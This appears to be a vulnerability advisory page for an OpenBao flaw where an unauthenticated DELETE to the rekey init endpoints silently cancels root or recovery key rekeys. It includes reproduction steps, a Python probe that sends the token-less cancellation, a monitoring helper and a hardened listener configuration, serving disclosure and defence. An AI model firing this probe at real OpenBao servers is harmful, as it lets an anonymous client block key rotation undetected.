OpenBao Unauthenticated Rekey Operation Cancellation Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability affects OpenBao versions prior to 2.3.0. An unauthenticated client can cancel an in-progress root rekey or recovery key rekey operation, and the cancellation is not recorded in the audit log. Legitimate rekey operations are disrupted, and because the abort is neither logged nor otherwise surfaced to operators, it leaves a gap in operational awareness.

Impact

Exploitation interrupts in-progress rekey operations, which are critical to rotating the root (unseal) and recovery key material. An attacker who can reach the listener can abort a rekey before the required number of key shares has been submitted and repeat this each time the operation is restarted, so the rekey never completes. Because the abort is unaudited, operators see the rekey state reset without any log entry explaining why.

Reproduction

To reproduce, send an HTTP DELETE request with no token to one of the rekey cancellation endpoints, `DELETE /sys/rekey/init` (root rekey) or `DELETE /sys/rekey-recovery-key/init` (recovery key rekey), while a rekey is in progress. The request requires no authentication or authorization, so any client with network access to the listener can abort an active rekey.
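The following script is an added example for checking a lab instance for this behaviour and for monitoring the gap it leaves; it is not code from the OpenBao project or the advisory. It assumes the standard API prefix (`/v1/sys/rekey/init` and `/v1/sys/rekey-recovery-key/init`) and that an accepted cancellation answers 204 No Content, as Vault documents for the same endpoints; the status-code classification and the sample status snapshots are constructed for illustration. The DELETE probe really cancels any active rekey on an unpatched server, so run it only against a test instance.

```python
"""Probe and monitoring helpers for the OpenBao unauthenticated rekey-cancel issue.

Added example, not OpenBao project code. Assumed: standard API prefix /v1,
204 No Content on an accepted cancel (per the Vault API docs for the same
endpoints). Run the DELETE probe against a lab instance only.
"""
import json
import sys
import urllib.error
import urllib.request

# Rekey cancel endpoints named in the advisory, keyed by which key is rekeyed.
REKEY_PATHS = {
    "root": "/v1/sys/rekey/init",
    "recovery": "/v1/sys/rekey-recovery-key/init",
}


def cancel_status(base_url, which="root", timeout=5.0):
    """Send an unauthenticated DELETE to a rekey-cancel endpoint; return the HTTP status.

    No X-Vault-Token header is sent on purpose: the question is whether the
    server accepts the cancellation from an anonymous client.
    """
    url = base_url.rstrip("/") + REKEY_PATHS[which]
    req = urllib.request.Request(url, method="DELETE")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(status):
    """Map the probe's status code to a verdict (code sets are an assumption)."""
    if status in (200, 204):
        return "vulnerable: unauthenticated cancellation accepted"
    if status in (401, 403, 404, 405):
        return "not exposed: cancel endpoint rejected or absent for anonymous client"
    return "inconclusive: status %d" % status


def rekey_status(base_url, which="root", timeout=5.0):
    """Read the rekey progress body from GET on the same path (no token needed)."""
    url = base_url.rstrip("/") + REKEY_PATHS[which]
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read())


def detect_cancellation(snapshots):
    """Find aborted rekeys in a series of rekey status bodies.

    The cancellation is not audited, so polling the status endpoint during a
    planned rekey window is the only server-side signal. A rekey that goes
    from started with progress < required to not started was cancelled, not
    completed. Returns the indexes of snapshots where that transition appears.
    Note that an operator's own `-cancel` looks identical; correlate with the
    runbook before treating a hit as hostile.
    """
    aborted = []
    for i in range(1, len(snapshots)):
        prev, cur = snapshots[i - 1], snapshots[i]
        if prev.get("started") and not cur.get("started"):
            if prev.get("progress", 0) < prev.get("required", 0):
                aborted.append(i)
    return aborted


# Constructed sample: a rekey with threshold 3 aborted after one share (index 2),
# then a second attempt that reached the threshold and completed (index 4).
SAMPLE_SNAPSHOTS = [
    {"started": False},
    {"started": True, "progress": 1, "required": 3, "nonce": "a1"},
    {"started": False},
    {"started": True, "progress": 3, "required": 3, "nonce": "b2"},
    {"started": False},
]


if __name__ == "__main__":
    # Usage: python probe.py http://lab-openbao:8200 [root|recovery]
    addr = sys.argv[1]
    which = sys.argv[2] if len(sys.argv) > 2 else "root"
    print(classify(cancel_status(addr, which)))
```

In a planned rekey window, poll `rekey_status` every few seconds and feed the list of bodies to `detect_cancellation`; with no audit entry to look for, an unexpected transition from "started" back to idle before the threshold was reached is the event to alert on.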

Remediation

Update to OpenBao 2.3.0 or later, where this vulnerability is patched. In addition, the listener option `disable_unauthed_rekey_endpoints=true` can be set manually to disable the unauthenticated rekey endpoints on global listeners. A future OpenBao release will set this option to true by default.
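An added example of the hardened listener configuration (not taken from the OpenBao documentation): it assumes the option belongs in the `listener "tcp"` stanza, which is how the advisory's "global listeners" wording is read here, and the addresses and TLS paths are placeholders.

```hcl
# Added example listener stanza, not OpenBao's own documentation.
# The only change from a default TLS listener is the last setting.
listener "tcp" {
  address       = "0.0.0.0:8200"          # placeholder
  tls_cert_file = "/etc/openbao/tls/server.crt"  # placeholder
  tls_key_file  = "/etc/openbao/tls/server.key"  # placeholder

  # Stops anonymous clients from reaching the rekey init/cancel endpoints
  # (DELETE /sys/rekey/init and DELETE /sys/rekey-recovery-key/init).
  disable_unauthed_rekey_endpoints = true
}
```

Before rolling this out, confirm that your rekey runbook does not rely on the unauthenticated endpoints, then verify the change by sending a token-less DELETE to the cancel endpoint from outside the cluster and checking that it is no longer accepted.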

Added: Jun 25, 2025, 5:19 PM
Updated: Jun 25, 2025, 5:19 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 0.6
exploitability: 8.4
remediation: 0.0
relevance: 0.2
threat: 4.8
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.